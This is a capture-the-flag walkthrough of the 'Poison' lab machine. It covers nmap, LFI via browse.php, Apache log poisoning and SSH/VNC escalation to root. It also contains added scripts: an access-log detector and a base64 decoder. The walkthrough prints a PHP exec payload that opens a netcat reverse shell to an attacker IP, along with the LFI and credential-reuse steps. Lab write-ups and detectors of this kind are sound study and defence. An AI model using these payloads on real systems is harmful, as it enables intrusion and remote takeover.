# Poison

## Nmap

```
sudo nmap 10.10.10.84 -p- -sS -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
```

Navigating to the root page on port 80, we are presented with a page for testing PHP scripts.

![http://10.10.10.84/](/files/-MZxXrKKY9FIb1od5AqC)

Entering a filename of `test` in the 'Scriptname' box and submitting shows an error that the file cannot be found. The URL in the browser's address bar shows that the filename is passed to `browse.php` in the `file` parameter (`browse.php?file=test`).

![http://10.10.10.84/browse.php?file=test](/files/-MZxYP1b7hBGXdbt6Qs4)

A simple check for LFI using the URL `10.10.10.84/browse.php?file=/etc/passwd` reveals the contents of /etc/passwd.

![http://10.10.10.84/browse.php?file=/etc/passwd](/files/-MZxaH3VtyFPTpdpk9r9)

From here I was unable to find anything of interest manually and was unable to brute-force the user 'charix', whom we obtained from /etc/passwd. From here we can fuzz for readable files through the LFI with Wfuzz, using the wordlist linked below:

{% file src="/files/-MZxyVKq5eVt\_wZDHQOZ" %}
LFI List
{% endfile %}

We can then run Wfuzz with the syntax below:

```
wfuzz -u 'http://10.10.10.84/browse.php?file=FUZZ' -w lfi.txt --hl 4
```

![](/files/-MZxypOMg51jn35Ziy2A)

Checking <http://10.10.10.84/browse.php?file=/var/log/httpd-access.log> confirms we can read the Apache access log, as the Wfuzz results above suggested.

![http://10.10.10.84/browse.php?file=/var/log/httpd-access.log](/files/-MZy-flmiS31Qln2Zopf)

Given the box name 'Poison', and the fact that we have LFI and can read the Apache log files, we can attempt to gain a shell by poisoning the logs.

I opened Burp Suite and intercepted a request to the log file. Since the LFI include executes any PHP code that ends up in the log, I inserted a PHP `exec` netcat reverse shell into the User-Agent header of the request.

```
<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.23 80 >/tmp/f') ?>
```

![Burpsuite](/files/-MZy2XWFn4r1rc9EB7Of)

After sending the request, set up a `netcat` listener and then use curl to include the log file through the LFI.

`netcat`:

```
sudo nc -lvp 80
```

Then execute curl:

```
curl http://10.10.10.84/browse.php?file=/var/log/httpd-access.log
```

This gives us a shell on the target machine.
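From the defender's side, every step of this chain is written to the very access log that gets poisoned: the probes for /etc/passwd and the log file itself arrive as `file=` values, and the PHP payload arrives as a User-Agent string. The script below is an added example and is not part of the original writeup. It parses a few constructed Apache combined-format log lines (not captured from the box) and flags three things: directory traversal sequences in query parameters (after undoing double URL encoding), requests that pull in sensitive paths such as /etc/passwd or anything under /var/log/, and a PHP open tag in the User-Agent or Referer header.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache "combined" log format. They are
# illustrative only and were not captured from the target in the writeup.
SAMPLE_LOG = """\
10.10.14.23 - - [10/Apr/2021:12:00:01 +0000] "GET /browse.php?file=test HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.23 - - [10/Apr/2021:12:00:05 +0000] "GET /browse.php?file=/etc/passwd HTTP/1.1" 200 1724 "-" "Mozilla/5.0"
10.10.14.23 - - [10/Apr/2021:12:00:09 +0000] "GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1" 200 8123 "-" "<?php echo 1; ?>"
10.10.14.23 - - [10/Apr/2021:12:00:13 +0000] "GET /browse.php?file=..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 1724 "-" "curl/7.74.0"
10.10.14.23 - - [10/Apr/2021:12:00:20 +0000] "GET /index.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Apache combined format: ip ident user [time] "method target proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Paths whose inclusion through a script parameter is almost never legitimate.
SENSITIVE_PATHS = ("/etc/passwd", "/var/log/", "/proc/self/")
# A PHP open tag (<?php or <?=) has no business in a client-supplied header.
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.IGNORECASE)


def analyse_line(line):
    """Return a finding dict for one log line, or None if nothing is suspicious."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    findings = []
    query = parse_qs(urlsplit(m["target"]).query)
    for values in query.values():
        for value in values:
            # parse_qs already removed one layer of URL encoding; decode once
            # more so %252F-style double encoding does not hide a traversal.
            decoded = unquote(value)
            if "../" in decoded or "..\\" in decoded:
                findings.append("lfi_traversal")
            if any(p in decoded for p in SENSITIVE_PATHS):
                findings.append("lfi_sensitive_path")
    if PHP_TAG_RE.search(m["ua"]) or PHP_TAG_RE.search(m["referer"]):
        findings.append("php_tag_in_header")
    if not findings:
        return None
    return {"ip": m["ip"], "time": m["ts"], "target": m["target"], "findings": findings}


def scan(log_text):
    """Run analyse_line over every line of a log and return only the suspicious ones."""
    return [f for f in (analyse_line(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["target"], ",".join(hit["findings"]))
```

The PHP-tag check is the high-confidence signal here: a benign client never sends `<?php` in a header, so a single match is worth an alert on its own, whereas the traversal and sensitive-path checks should be tuned against the application's real parameter names to keep noise down. Running the script on the constructed sample flags three of the five lines; the plain `file=test` request and the `/index.php` request pass through clean.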

![](/files/-MZy2zWFBUlM5n-8Hz5x)

Using `ls -la` shows we have a pwdbackup.txt file in the current directory.

![](/files/-MZy3Z1JwjAiOxw7VlgB)

The contents of this file are shown below:

![](/files/-MZy3nOlrl2J6Dip_L0W)

I used the following website to decode the string 13 times: [https://www.base64decode.org/](https://www.base64decode.org), which gave the end result `Charix!2#4%6&8(0`.
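Decoding 13 layers by hand on a website is tedious and easy to miscount; the same result comes from a short loop that keeps decoding while the output is still valid base64 and stops as soon as it is not. The Python below is an added example and not from the writeup. It does not read pwdbackup.txt; instead it builds its own constructed sample by encoding the recovered string 13 times and line-wrapping it at 76 columns (an assumption about how such a backup file is usually saved), then peels the layers off again while tolerating that whitespace.

```python
import base64
import binascii


def layer_encode(plaintext: bytes, layers: int) -> bytes:
    """Apply base64 `layers` times (used only to build the constructed sample)."""
    out = plaintext
    for _ in range(layers):
        out = base64.b64encode(out)
    return out


# Constructed sample: the string recovered in the writeup, encoded 13 times and
# then line-wrapped at 76 columns (assumed layout of a saved backup file).
_encoded = layer_encode(b"Charix!2#4%6&8(0", 13)
SAMPLE_BACKUP = b"\n".join(_encoded[i:i + 76] for i in range(0, len(_encoded), 76))


def looks_like_base64(data: bytes) -> bool:
    """True if data (ignoring whitespace) is valid base64 that decodes to printable text."""
    compact = b"".join(data.split())
    if not compact or len(compact) % 4:
        return False
    try:
        decoded = base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return False
    # Stop as soon as a layer decodes to something that is not text.
    return all(32 <= b < 127 or b in (9, 10, 13) for b in decoded)


def peel_base64(blob: bytes, max_rounds: int = 64):
    """Decode repeatedly while the data still looks like base64.

    Returns (final_bytes, rounds). max_rounds is a guard against input that
    happens to stay valid base64 indefinitely.
    """
    current = blob
    rounds = 0
    while rounds < max_rounds and looks_like_base64(current):
        current = base64.b64decode(b"".join(current.split()), validate=True)
        rounds += 1
    return current, rounds


if __name__ == "__main__":
    plaintext, rounds = peel_base64(SAMPLE_BACKUP)
    print(f"{rounds} layers removed -> {plaintext.decode()}")
```

The stop condition is the only subtle part: a plaintext that is itself a multiple of four alphabet characters and decodes to printable bytes would be decoded one step too far, so when the expected format is known (here, a password containing punctuation such as `!` and `#` that is outside the base64 alphabet) it is worth checking the result against that expectation rather than trusting the round count blindly.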

Knowing that charix is a user on the target machine and that SSH is open, we can try the credentials.

![](/files/-MZy5Lgjvb9j9L_NA-VT)

Checking the current directory, we have a user flag and a secret.zip. I then used the `scp` command below to transfer secret.zip back to my attacking machine.

```
scp charix@10.10.10.84:/home/charix/secret.zip ./
```

![](/files/-MZyAjerLn4nFPEVZ1eH)

After this completed I attempted to extract secret.zip and was prompted for a password. I tried charix's password, hoping for password reuse, and was able to open the zip file. Attempting to read the extracted contents shows only a string that is not readable.

![](/files/-MZyBDB0FzejgoleIAoX)

Moving on to some more basic manual enumeration, we find an interesting process running in the context of the root user.

```
ps aux | grep root
```

![](/files/-MZy5hbGHv9qM3msi08d)

The root account is currently running Xvnc. The image above shows the `ps` output is truncated, so we need to run it again with wide output (`-ww`) to see the full command line.

```
ps -auxww | grep Xvnc
```

![](/files/-MZyCHZyeYm0kZ5QD_jO)

We can see from the above that the service is listening on port 5901. Looking back at the initial `nmap` scan, this port was not reachable from outside, so it will need forwarding before we can access it.

As we have SSH credentials, we can use SSH to forward the target's local port 5901 to a port on our attacking machine.

```
ssh -L 4444:127.0.0.1:5901 charix@10.10.10.84
```

Once connected, we can run `nmap` against our local port 4444 to check that the forward works.

![](/files/-MZyDs9sX-CzWsvb_u4f)

Kali comes preinstalled with `vncviewer`, which we will use to attempt to connect to VNC.

```
vncviewer 127.0.0.1::4444
```

Once connected, we are prompted for a password. I tried charix's password and a few common easy ones with no luck.

![](/files/-MZyEjcDYuFWbYMNhta7)

Looking at the `-h` options for `vncviewer`, we notice we can provide a password file. I tried the secret.txt from earlier and was given access.

```
vncviewer 127.0.0.1::4444 -passwd ~/secret
```

![](/files/-MZyF7bEmTyLKDYnzbYy)

